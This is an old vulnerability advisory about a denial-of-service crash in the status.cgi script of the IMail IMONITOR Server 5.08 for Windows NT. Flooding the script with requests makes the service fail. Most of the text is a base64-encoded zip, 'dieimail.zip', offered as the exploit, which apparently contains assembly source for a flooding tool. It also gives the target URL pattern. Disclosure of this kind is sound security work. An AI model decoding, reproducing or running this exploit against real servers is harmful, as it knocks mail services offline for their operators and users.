COMMAND
IMail IMONITOR Server
SYSTEMS AFFECTED
IMail IMONITOR Server for WinNT Version 5.08
PROBLEM
Mail Server is the choice of Business, Schools, and Service
Providers. Unlike Microsoft Exchange and Lotus Notes, which are
costly to deploy and cumbersome to administer, IMail Server is
easy to install and easy to manage. It has a fixed cost and is
scalable to thousands of users per server.
UssrLabs found a bug, in the Imail Imonitor Service. Vulneravility
is in a Cgi-Script (status.cgi), this Script checks if the Server
Services is runing (and it spends too much CPU in this operation
we might add), if you execute the status.cgi, lots of times in a
short time the Imail Imonitor will crash with an "Invalid Memory
Address", and our friend DrWatson tells us to close the program.
Example:
http://ServerIp:8181/status.cgi
And you will See something like this.
|---------------------------------|
|Service | Status |
|SMTP | UP |
|POP3 | UP |
|DNS | UP |
|WEB | UP |
|TELNET | UP |
|FTP | UP |
|03:33:00 | 03:32:00 |
|_______________|_________________|
refresh
If you Run the Status.cgi lots of times, the server will crash.
The exploit:
---
Content-Type: application/octet-stream; name="dieimail.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="dieimail.zip"
Content-MD5: B0c9AV6ox+sdU6L9/4Qsrw==
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
-----
SOLUTION
Nothing yet, but vendor has been informed, tracking number for
this inquiry is IMS2000010500000096.